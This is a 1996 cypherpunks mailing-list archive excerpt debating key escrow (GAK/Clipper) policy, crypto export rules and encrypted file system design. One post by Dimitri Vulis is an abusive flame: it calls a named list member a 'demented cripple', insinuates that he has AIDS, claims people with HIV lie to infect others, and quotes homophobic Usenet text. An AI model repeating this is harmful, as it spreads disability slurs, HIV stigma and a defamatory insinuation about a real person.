Date: Mon, 15 Jul 1996 23:23:46 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
Message-ID: <2.2.32.19960715105048.0082a620@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 PM 7/14/96 -0700, David Sternlight wrote:

>Did you miss the part in the Constitution about "provide for the common
>defence" 

That's a meaningless part of the Preamble.  And in any case, it's a
statement of why "the People of the United States" wrote the Constitution.
It's not an oath of the President.

>and about the President's associated responsibility to "take care
>that the laws be faithfully executed"?

There is no law that specifically controls export of crypto, is there?  I
was under the impression that is an item on a list of regulated items drawn
up by bureaucrats and could be changed any time the Executive Branch chose.
a reg isn't a law.  

>And what oath do you suppose binds him because "The President shall be
>commander in chief of the army and navy of the United States"?

That's a job title.  It doesn't command him as to what he should do in the
job.  In fact, the Commander In Chief is not under the Uniform Code of
Military Justice and so can do anything he wants with that particular
"office" subject only to impeachment and the willingness of the armed forces
to obey him.

It certainly doesn't require him to adopt any particular regulatory
strategy.  President Browne could legalize the export of all crypto by
executive order on January 20th 1997 without violating his oath.  That's one
of the effects of a "strong executive."

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 16 Jul 1996 06:32:07 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE, FLAME] Cypherpunk kook slanders
In-Reply-To: <2.2.32.19960715042208.00ad81b4@mail.teleport.com>
Message-ID: <oPu4qD144w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> writes:

> At 12:23 PM 7/14/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>
> [Alot of bullshit deleted]

As an amusing aside, the text that Alan Olsen deleted was the quote from
our least favorite cripple. My response only started here:

> >I remember how someone recently argued on news.groups that Bruce Bough's vot
> >should be invalidated because he's dying from AIDS. I strongly disagree with
> >Dan's (?) reasoning, which was, I recall, that someone with only a couple of
> >months left to live shouldn't be telling others how to run Usenet after his
> >death. I think we should consider Bruce's opinions as being representative.
> >After all, a Usenet vote is an interest poll, and the voters are just a samp
> >of a larger population. Not everyone who thinks like Bruce Bough is going to
> >die together with him from AIDS within a few months (sigh). Let him vote.
>
> I have no idea where you got the idea that Bruce has AIDS.

I was also responding to this article by Dan Hartung, a Usenet votetaker:

]Path: ...!Q.Net!nntp1.best.com!news1.best.com!nntp.primenet.com!news.sprintlink.net!news-stk-3.sprintlink.net!news.ultranet.com!homer.alpha.net!uwm.edu!math.ohio-state.edu!howland.reston.ans.net!newsfeed.internetmci.com!in2.uu.net!in-news.erinet.com!ddsw1!news.mcs.net!usenet
]From: Dan Hartung <dhartung@mcs.net>
]Newsgroups: news.groups,alt.config,soc.motss
]Subject: Re: Proposal: Ban Homosexuals for Usenet Votes
]Followup-To: alt.bonehead.john-grubor
]Date: Sat, 15 Jun 1996 00:08:26 -0500
]Organization: Rotaract Club of Evanston
]Lines: 13
]Message-ID: <31C2454A.71B9@mcs.net>
]References: <199606122318.QAA27943@jobe.shell.portal.com>
]NNTP-Posting-Host: dhartung.pr.mcs.net
]Mime-Version: 1.0
]Content-Type: text/plain; charset=us-ascii
]Content-Transfer-Encoding: 7bit
]X-Mailer: Mozilla 3.0b4 (Win95; I)
]
]anonymous-remailer@shell.portal.com wrote:
]> The Subject says it all.  Usenet votes are supposed to be reader interest
]> polls. Who cares about the opinions of someone who's going to die from AIDS
]> in a month, and won't be rrading Usenet anyway? Their votes shouldn't count.
]
]Absolutely.  I couldn't agree more.  But we have to have a litmus test,
]a means for determining precisely who is homosexual.  I know!  We'll
]just assume anyone who conceals their identity is homosexual.
]
]--
]Daniel A. Hartung       |   I believe we can fly
]dhartung@mcs.com        |         on the wings that we create
]www.mcs.net/~dhartung/  |                 -- Melissa Etheridge

As you see, I find Dan Hartung's homophobic ravings even more distasteful
than the whining cripple's censorous demands that cypherpunk technology not
be used to promote homophobia, as in the abive example. I actually defended
the cripple from Dan Hartung in the above quote.

As for AIDS, I remind you that some people with AIDS or HIV lie about their
condition on purpose, in order to infect others. A very angry demented cripple
would fit this pattern.

> As for him "dragging outside articles into this group"...  You must mean him

Alan Olsen is lying again, as usual. The cripple has on numerous occasions
forwarded entire large Usenet articles to the cypherpunks mailing list whose
only relevance was a mention of my name in some derogatary way. He's been
trying to drag his little Usenet flame wars to this mailing list for months;
finally he succeeded.

> Another thing that you need to do is learn how to comprehend written english.

That's a pretty racist remark.

> Bruce is a very nice guy who has some health problems.  I know few people
> who have met him who have not gotten along with him.

Are you talking about the same demented cripple who tried to organize a
"cypherpunks" meeting at his place and specifically excluded certain people
because he didn't like their political views?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 15 Jul 1996 23:38:36 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Opiated file systems
Message-ID: <199607151158.HAA28540@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jul 96 at 12:48, Adam Back wrote while high on Ritalin:

> Some more thoughts on encrypted file system design criteria.
> A wish list:
> 
> - Choice of secret key encryption algorithms (IDEA, 3DES, MDC, Blowfish)

Nice in theory. Awful in practice.  Requires code for managing keys, 
encrypting and decrypting for ea. algorithm be resident in memory.  
For some systems (MSDOS), free memory is at a premium... (one of the 
reasons SecureDrive is popular is because it takes only 2.5k).  It's 
not worth wasting memory for handling several algorithms when only 
one is going to be used in most cases.
 
> - Multiple architectures (MSDOS, Win31, Win95, WinNT, Unix, Mac)

Ok...
 
> - High performance (hand optimised assembler for each architecture)

So much for maintaining code across platforms.
 
> - Compression

Not worthwhile.  Use a Stacker or JAM driver over the encrypted 
partition on a PC, for instance.  Keep compression and crypto 
separate utilities... keeps bugs from one interfering with another 
and reduces complexity of both drivers; also, if one wants crypto 
w/out compression or compression w/out crypto, no wasted memory (see 
above about RAM being at a premium).

> - Ability to chain algorithms (IDEA and then 3DES for example)

Why?  Doesn't necessarily increase security, esp. considering the 
performance hit (memory... see above, time, key management).

> - Possible to have encrypted file systems on separate partitions, or
> 
> - Encrypted file system located in a file in another file system 
>   (much like DOS stacker drives) this is an ease of use criteria -- I
>   suspect re-partitioning drives would put off many potential users.

Nothing new there.

> - Ease of use.  Graphical user interface for setup and administration
>   functions, with a very simple set of configurations options
>   displayed by default, with more advanced configuration options
>   available in "expert" mode.

A common problem with much crypto these days.

> - All directory and FAT information should be encrypted, so that
>   it is not possible to discover even number of files, or percentage
>   of disk used without the key

Do you understand how such systems work?!?  Every sector is 
encrypted in such systems.  That's not even an issue for most 
encrypted file systems (at least on the PC).

> - Facility for duress key, with the real data hidden in the unused
>   space of the first encrypted drive.  To increase the plausible

Huh?!?

>   deniability all unused blocks within a file system should be filled
>   with garbage, so that it is not possible to tell if there is more
>   data there.

If the algorithm is good, this shouldn't matter.  The only way a 
person could tell if a sector is unused is if that person was able to 
mount the partition already.

> - File system steganographically hidden in files on another file
>   system (encrypted or not).  Support for a wide selection of file
>   formats (Aiff, Wave, Midi, JPEG, GIF, RGB, MPEG).

Now this is getting nutty!!!  Never mind the size, compleixty and 
amazing slowness of such a driver...  you'd have to have audio or video
files of gigabytes in size to be able to store anything of use.

> - Ability to use stegoed file system in files on an unencrypted
>   file system, and boot from a floppy to access stegoed file system,
>   with no other traces left on hard disk.

Why?  The authorities would wonder why you have an 8 Gig JPG on your 
disk and figure you're using it for stego, or you're crazy, or both, 
and have you committed.

Rob.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Tue, 16 Jul 1996 00:47:50 +0800
To: cypherpunks@toad.com
Subject: ccMail SMTPLINK Undeliverable Message
Message-ID: <2.2.32.19960715123534.006d0478@bah.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>Well, with the UCMJ ( Uniform Code of Military Justice ) and the Oath of
>Allegiance Military Personnel take on induction being re-written to Support
>and defend the United Nations and to accept direct and lawful orders from UN
>personnel, this doesn't surprise me.Soon, UN Secretary-General Boutros
>Boutros-Ghali, or someone like him will repeal more of the amendments to our
>constitution.  First our guns, then our code. 
>
>I'll give up my pass phrase when
> they pry it from my cold dead fingers !
>
>>Date: Sun, 14 Jul 1996 18:22:00 -0700
>>From: Alan Bostick <abostick@netcom.com>
>>Organization: Arrogant Opinions 'R' Us
>>To: cypherpunks@toad.com
>>Subject: Organized Crime Home Page - Four Horsemen, No Waiting
>>X-URL: http://www.mywebsite.com:1080/cgi-bin/bvolmgr.cgi?BVpage=management
>>Sender: owner-cypherpunks@toad.com
>>
>>Cypherpunks interested in establishment scaremongering are invited
>>to take a look at the Organized Crime Home Page 
>>(http://www.alternatives.com/crime/index.html), sponsored by a group
>>called The Committee for a Safe Society, about the world-wide threat
>>of organized crime.  Apparently every evil known to post-Cold-War
>>society, even the bad weather in Chicago, is the responsibility of
>>organized crime.  Now you know why governments need GAK.
>>
>>Alan-Bob says check it out.
>>-- 
>>Alan Bostick               | [Spielberg's] latest is TWISTER, a film that
>>mailto:abostick@netcom.com | gives whole new meaning to the phrase "giant
>>news:alt.grelb             | sucking sound."  -- Patrick Taggart
>>http://www.alumni.caltech.edu/~abostick
>>
>>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 16 Jul 1996 01:11:56 +0800
To: cypherpunks@toad.com
Subject: Gorelick GAKs away on CSPAN2
Message-ID: <199607151243.IAA36146@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I managed to miss seeing the Deputy Attorney General, whose name I will
resist [with great effort] making a very tasteless joke about, but I've
decided to briefly delurk to ask a question I have wondered about for
some time:

Who (an *individual's name*, not a department, please) came up with my
unfavorite Orwellian-term, "key escrow"? I think it was likely a Bush
administration official, and probably an attorney [ie. should have known
better]. I am, as many of you know, trying to redefine the terms of the
debate to our favored term, "GAK" -- although I must say the temptation
was strong to try for "Federal Usurpation of Crypto Keys [etc.]" but I
feel it's important to try to keep the debate polite until they reach
the "cold, dead neurons" stage...

Anyway, I assume this Bush administration official, like David Kessler,
<spit!> is still a government employee -- and I would very much like to
write a polite (believe it or not) letter to him or her, concerning the
origin of the term. I will, of course, report back to the list if I get
a reply.

PS Loren Riddel(sp?) - I am back in south Florida, please send me your
key and the secret word(s) in a PGPmessage.
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

 "The president has kept the promises he meant to keep."
  -- George Stephanopoulos (tells the truth, for once).
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, "Pennies For Perot" page! CYA with  http://www.anonymizer.com
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMeo56G1lp8bpvW01AQFWcQQAsw/oUk57ljTKzO8lNgXoV7Lmoo2vWzw0
bk6fxGalAkDXtcgsPDdHBZ/ZV6EIpUhoIgAXi1G9ByI3jG36gxvWDD8eh2mr/ize
5HD9SKkgqCp09zwjKyBKwKAfZPGAT8oWlE0QOeBbp4ayGt+KRYk2llxultkYVlIS
4KQ5r+WQg6U=
=dymZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Jul 1996 07:12:39 +0800
To: cypherpunks@toad.com
Subject: Global Government Access to Keys (GGAK)
Message-ID: <ae0fb0c404021004f1ef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:37 AM 7/15/96, Bill Frantz wrote:
>At  2:05 PM 7/13/96 +0000, Deranged Mutant wrote:

>>Or what if some terrorist was using keys escrowed in a country that
>>sponsered terrorist acts?
>
>Deranged Mutant is absolutely right.  There are about 150 (or so)
>governments in the world.  When people talk about making keys available to
>government (or law enforcement), always ask, "Which governments can access
>these keys?"  If I were a non-French corporation, I would feel distinctly
>nervous if the answer included France.  (There are a number of other
>countries where the security services have also been suspected of engaging
>in industrial espionage.)

There are some interesting "public relations" stunts we can use to
undermine support for the concept of GAK:

* Announce in corporate press releases (for some Cypherpunkish company?)
that "As per the laws of the Libyan Arab Jamahiriya, we have provided Col.
Qaddaffi's Office of People's Security with our encryption keys for all
communications passing into, out of, or over Libyan soil."

(This would likely horrify the U.S. security establishment, were it to be
actually true. But it is of course essentially symmetrical with the fear
those in Germany, India, Iraq, etc. would have if told to deposit copies of
their keys with the U.S. National Security Agency or any other "trusted
third party" mandated.)

(I can't resist another aside. Sorry. In addition to the abuse of the
English language with using "escrow" in this warped sense, we now have
"trusted third party" used in a warped sense. "We're not saying _you_ trust
them, we're saying the NSA trusts them.")

* "The U.S. has designated J. P. Morgan and Company as a Designated Trusted
Authority for the deposit of encryption keys for Jewish persons wishing to
communicate in primarily Islamic countries."

(Making the point that any international key escrow scheme which complies
with various nation's laws must collide with American values about such
things. In many Arab countries, Jews are restricted in various ways. Do we
want the government of the U.S. participating in such restrictions? And
what about the Arab boycott? It may be in decline now, but not with all
countries.)

* "The United States Office of Communications Security has turned over to
the government of Singapore a list of all persons suspected of
circumventing Singaporan law regarding encryption."

(ObNazi Reference: One can imagine how a GAK program would've worked during
the Third Reich. Not only would communications have been read, regardless
of the supposed legal protections, but GAK would have been used to compile
contact lists of people to be rounded up. Sort of the way the U.S.
government violated the laws about the U.S. Census to illegally use census
records to locate "Japs" for assignment to concentration camps.)

And so forth, concentrating on the essentially intractable problem of how
to "escrow" keys with foreign governments imimical to Western values.

(The crypto literature, esp. the Proceedings of the Crypto Conference,
circa the mid-80s, refers to this as the "rogue government" problem, esp.
with regard to the issuance of false "is-a-person" credentials. That is,
suppose a Global Identification Infrastructure (GII) is implemented,
consistent with Global Government Access to Keys (GGAK). What about some
countries, whether they be the Free Republic of Libertaria or the Libyan
Arab Jamahiriya, who either refuse to play along or who subvert the system
with false information? What if the United States itself issues false
identities to its secret agents, its informants, and its 60,000+ people in
the so-called Witness Security program?)

There are other aspects of GAK which also collide with basic values. For
example, consider several classes of communications we consider
"privileged":

-- attorney-client discussions, in person or over phone lines.

-- doctor-patient discussions

-- psychiatrist--patient discussions

-- priest--penitent confessions

Are the computer communications (likely in the future to increase, even if
not common now) of these groups to be GAKked? Even with "safeguards," the
priest--penitent relationship will be forever compromised, with neither
side knowing whether some secret policemen is listening.

These are not new issues; we talked about them several years ago. But now
that GAK is being discussed again....

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 16 Jul 1996 00:58:49 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Clueless "Attachment converted" uses
In-Reply-To: <ae0f1d14030210043edc@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960715085744.5512B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On a very similar note - could people who are using clear-text PGP 
signatures with mime use text/... instead of application/...; that way 
people without pgp will see the message text without having to mess with 
their mailcaps (that's the way text/* is supposed to work)

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 16 Jul 1996 01:25:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <199607151322.JAA05857@nrk.com>
MIME-Version: 1.0
Content-Type: text


Tim May:
> 
> At 12:18 AM 7/15/96, Dave Banisar wrote:
> >Its now up at http://www.epic.org/crypto/key_escrow/wh_cke_796.html
{}
> The report speaks of an "emerging consensus" (for key escrow). I see just
> the opposite, unless the report is speaking only of the U.S. intelligence
> and law enforcement community....{}
{}
> So, who is in this "emerging consensus"?

Don't be so sure the FI community has any consensus within *its*
ranks, much less with the LE community. I've heard comments from
insiders that were 180 out with that concept.

[Not to mention that, in general, intercene warfare in the
Community is a much-practiced art.]

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Jul 1996 08:20:53 +0800
To: cypherpunks@toad.com
Subject: Further Trends in Key Escrow?
Message-ID: <ae0fbf7b0602100466fc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'm watching a CNBC report about the NASDAQ market and proposed fixes to
certain alleged abuses about stock recommendations, bid-ask spreads,
brokers, etc.

One of the "industry" proposals involving taping the phone calls of NASDAQ
brokers. (The proposal: 10% of all calls to customers would be recorded for
later review.)

It occurs to me that wider taping/interception of communications could be a
consequence of a wide move toward "key escrow." And not just by
governments.

Once communications are "escrowed," the infrastructure for gaining access
to communications is available. Thus, professional associations may request
access, as with the NASDAQ talk of tapping the phone calls of brokers.

(To be clear, this is a tapping system which NASDAQ dealers would have to
agree to deploy in order to keep their affiliation; as this is ostensibly a
voluntary, non-coerced,  private arrangement, I don't argue it should be
outlawed. I don't like it, but my concern is elsewhere: namely, the
temptation to use a GAK system for these and similar purposes.)

The whole infrastructure of mandatory voluntary key escrow could allow all
sorts of special interest groups to ask for access and insist upon it with
their members, customers, and affiliates.

A danger to think about. Even if the non-government gakkings are ostensibly
voluntary, the effect would be a sea change in expectations of
communications privacy, with the key escrow infrastructure used to give
access to formerly secure communications to growing numbers of groups.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jul 1996 07:07:33 +0800
To: Raph Levien <tcmay@got.net>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607151637.JAA29185@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 AM 7/15/96 -0400, Raph Levien wrote:

>[much, much elided from Tim's post]
>> ... and by opposition to Clipper I,
>> Clipper II, and now Clipper III.
>
>Is this Clipper III or Clipper IV? I seem to have lost count.

I think it's Clipper 3.14159.   They seem to be going around in circles.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 16 Jul 1996 06:55:30 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Organized Crime Home Page - Four Horsemen, No Waiting
In-Reply-To: <31E99D38.75AC@netcom.com>
Message-ID: <Pine.LNX.3.93.960715094923.3941B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jul 1996, Alan Bostick wrote:

> Cypherpunks interested in establishment scaremongering are invited
> to take a look at the Organized Crime Home Page 
> (http://www.alternatives.com/crime/index.html), sponsored by a group
> called The Committee for a Safe Society, about the world-wide threat
> of organized crime.  Apparently every evil known to post-Cold-War
> society, even the bad weather in Chicago, is the responsibility of
> organized crime.  Now you know why governments need GAK.

     Well, they are wrong. The bad weather in Chicago is the governments
fault. Ok, that counts as organized crime...


--Chicago, the only city in the world where the wind hits you from 3 
   directions at once.
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <s_levien@research.att.com>
Date: Tue, 16 Jul 1996 03:08:24 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <31EA4E91.37B3@research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 12:18 AM 7/15/96, Dave Banisar wrote:
> >Its now up at http://www.epic.org/crypto/key_escrow/wh_cke_796.html

   Thanks to Dave for posting this URL. This is a _very_ important 
document, and I would recommend that all concerned cypherpunks read it 
carefully. Unlike many of its predecessors, it is clearly written and 
quite upfront about the "administration's" goals.

> Thanks. I took an initial look, and it looks like the same old stuff.

   It's not. There's a lot in this document that hadn't been clear to me 
before. I will try to summarize the highlights (these are all my 
interpretations, not actual points made in the document).

1. The battle over whether applications can contain strong encryption 
algorithms has basically been lost. For example, SSL-enabled 
applications are widely available over the world, thanks in large part 
to the work of Eric Young. The same will happen for any other encryption 
protocol that catches on.

2. The battle for key management has not yet been fought. The lack of a 
key management infrastructure is the main reason why people don't use 
PGP widely. This is demonstrated quite clearly by the fact that only a 
few of the people I correspond with, including many premail users, 
actually encrypt messages on a routine basis. If the key management 
stuff were in place, it would "just work."

3. Anybody can write an application that supports strong encryption 
algorithms. Witness SSH, a very impressive and useful program, which was 
basically done by one person, Tatu Ylonen. However, building a key 
management infrastructure will take lots of money, hard work, and 
cooperation.

3a. Consider a future scenario in which a key management infrastructure 
allowed big, unescrowed keys to be distributed widely, but that export 
controls on clients prohibited the use of secure symmetric algorithms. 
Such a situation would not be stable - the incremental cost of 
uncrippled clients would be so small, and so tempting, that they would 
spread like wildfire.

4. Thus, the best leverage for the TLAs to win is to guide the 
development of a key management infrastructure with the following 
property: if you don't register your key, you can't play. I believe that 
this is the true meaning of the word "voluntary:" you're free to make 
the choice not to participate.

5. This is _important_. If you can't get the keys for your 
correspondents, you can't use encryption. If they build a key management 
infrastructure that actually works, people will use it.

6. Export is a two player game. The other country has to allow import of 
the stuff, too. If the Burns bill passes, the "administration" would 
strong-arm other countries to prohibit import of strong crypto, still 
leaving US developers with no market.

7. Building this stuff is too much of a task for the TLAs. They tried it 
with Clipper, and it failed. They hoped that building the Tessera card 
would be enough - that once they threw it over the wall, it would be 
eagerly snapped up by industry.

8. Thus, they're going to cajole, bribe, and coerce software companies 
to play along. This fact is quite nakedly exposed in the document (good 
thing the injunction against the CDA is still in force :-).

[much, much elided from Tim's post]
> ... and by opposition to Clipper I,
> Clipper II, and now Clipper III.

Is this Clipper III or Clipper IV? I seem to have lost count.

> A bunch of Congressmen, including the axis supporting the Burns bill,
> obviously are not part of this emerging consensus.

So it's a "rough consensus" in the spirit of the IETF :-)

> I would push hard on Netscape, Microsoft, Novell, Sun, Apple, and the other
> companies (but mainly on Netscape and MS, for obvious reasons) to bundle in
> "trusted third parties" and all that GAK stuff. Bundle it in, make it easy
> to use, make it easy to export, make it easy to spread in crypto-hostile
> countries, and hope like hell that it undermines the push for PGP and
> S/MIME.

You can count on the fact that NMNSA&c are already being wooed quite 
sweetly.

Don't put too much stock in the push for PGP and S/MIME. Five million 
dollars later, PGP 3.0 is still stuck in the mud. S/MIME has serious 
protocol weaknesses that are still not being addressed. But, most 
importantly, neither of these systems can actually be used on a 
widespread basis, because of the lack of a key management 
infrastructure.

> Don't be fooled.

Who? Us cypherpunks?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jul 1996 08:54:07 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <199607151701.KAA00537@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:05 PM 7/14/96 -0700, David Sternlight wrote:

>This post is a courtesy to others who may have been expecting more. 

It's not that we're expecting more...it's just that we're hoping for BETTER.

>It's a
>one-time statement to this list, which I've just joined, of my current
>practice: Silence does not constitute assent.
>David

Well, that's where you're confused.  Our positions are not morally 
equivalent.  Despite trying to hide behind the smokescreen of calling the 
government's GAK position "voluntary," we all know that they are trying to 
misuse their influence to gently force us to use GAK, if by no other means 
that forcing the taxpayer to pay for the system as they have done already.  

The opponents of GAK, on the other hand, are not denying to anyone the right 
to implement a truly voluntary "key-escrow" system, or more likely many 
privately operating ones.  However, such systems will be a service for the 
customer, not the government, and the key will almost certainly not be 
provided to the government on request, and in fact the key will likely be 
stored in an encrypted form that the government won't be able to use.

Quite simply, we do not require your "assent."  You should be trying to get 
OURS.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 16 Jul 1996 02:32:19 +0800
To: cypherpunks@toad.com
Subject: Seek-and-Destroy
Message-ID: <v01510100ae100d6e192f@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Do NOT visit:
  http://xxx.lanl.gov/seek-and-destroy

The sysadmins for xxx.lanl.gov don't like robots visiting their web site,
so they've published a statement on indexing at:
  http://xxx.lanl.gov/RobotsBeware.html

Remember, do NOT click on:
  http://xxx.lanl.gov/seek-and-destroy

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 16 Jul 1996 01:47:58 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <Pine.SUN.3.94.960715100239.25657F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jul 1996, Timothy C. May wrote:

> So, who is in this "emerging consensus"?
> 
Foreign governments?  
(Process of elimination, not inside info...)



A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 16 Jul 1996 06:53:27 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Organized Crime Home Page - Four Horsemen, No Waiting
In-Reply-To: <31E99D38.75AC@netcom.com>
Message-ID: <Pine.LNX.3.93.960715095408.3985A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jul 1996, Alan Bostick wrote:

> Cypherpunks interested in establishment scaremongering are invited
> to take a look at the Organized Crime Home Page 
> of organized crime.  Apparently every evil known to post-Cold-War
> society, even the bad weather in Chicago, is the responsibility of
> organized crime.  Now you know why governments need GAK.
> Alan-Bob says check it out.

     I just a crack about government being organized crime, then I 
came across their defination:

" DEFINING ORGANIZED CRIME

We could define organized crime as an agreement between men to forward a 
common cause, using other humans as tools for advancement, without regard 
to the health or happiness of those "other" humans outside the group.

Using humans may involve selling them as slaves, selling them as prostitutes, 
draining their resources with addictive drugs or gambling, extortion, theft, 
kidnapping, or murder. These are generally associated with organized crime, 
and not with "legitimate business"."

___________________________________________________________________________

     Given the first paragraph, governement could _easily_ fall into such
a defination, and taxes are just a little like extortion.
  

     Maybe these people aren't total loons, but I'd suggest they've read
Neurmancer once too often.
 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 16 Jul 1996 02:49:28 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Someone can't read
Message-ID: <199607151408.KAA06134@nrk.com>
MIME-Version: 1.0
Content-Type: text


>    Clinton Proposes Initiatives On the Scrambling of Data 
{}
>    The insistence of the Administration on moving forward on 
>    key-escrow technology appears to ignore the advice of a May 
>    report by the National Research Council, which recommended 
>    going more slowly on key escrow because the technology had 
>    not yet been proved feasible. 
>  
>    Administration officials said yesterday, however, that they 
>    were better informed than the council's members realized. 
>  
>    "We're further down the road on key-escrow technology than 
>    the N.R.C. is familiar with," said Greg Simon, Vice 
>    President Al Gore's chief domestic policy adviser. 


As I recall the NRC members in DC said, in *EXPLICITLY* rejecting
the "If only you know what we know..." mantra, that if there was
something the [NRC] did not know, it wasn't cuz that had not asked
everyone involved. (Or words to that effect)

So it appears the Admin was withholding data from the Congress....

	I have here in front of me, documented proof that there
	are crypto-carrying members of the Cypherpunk Party...


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 09:08:25 +0800
To: Arun Mehta <cypherpunks@toad.com
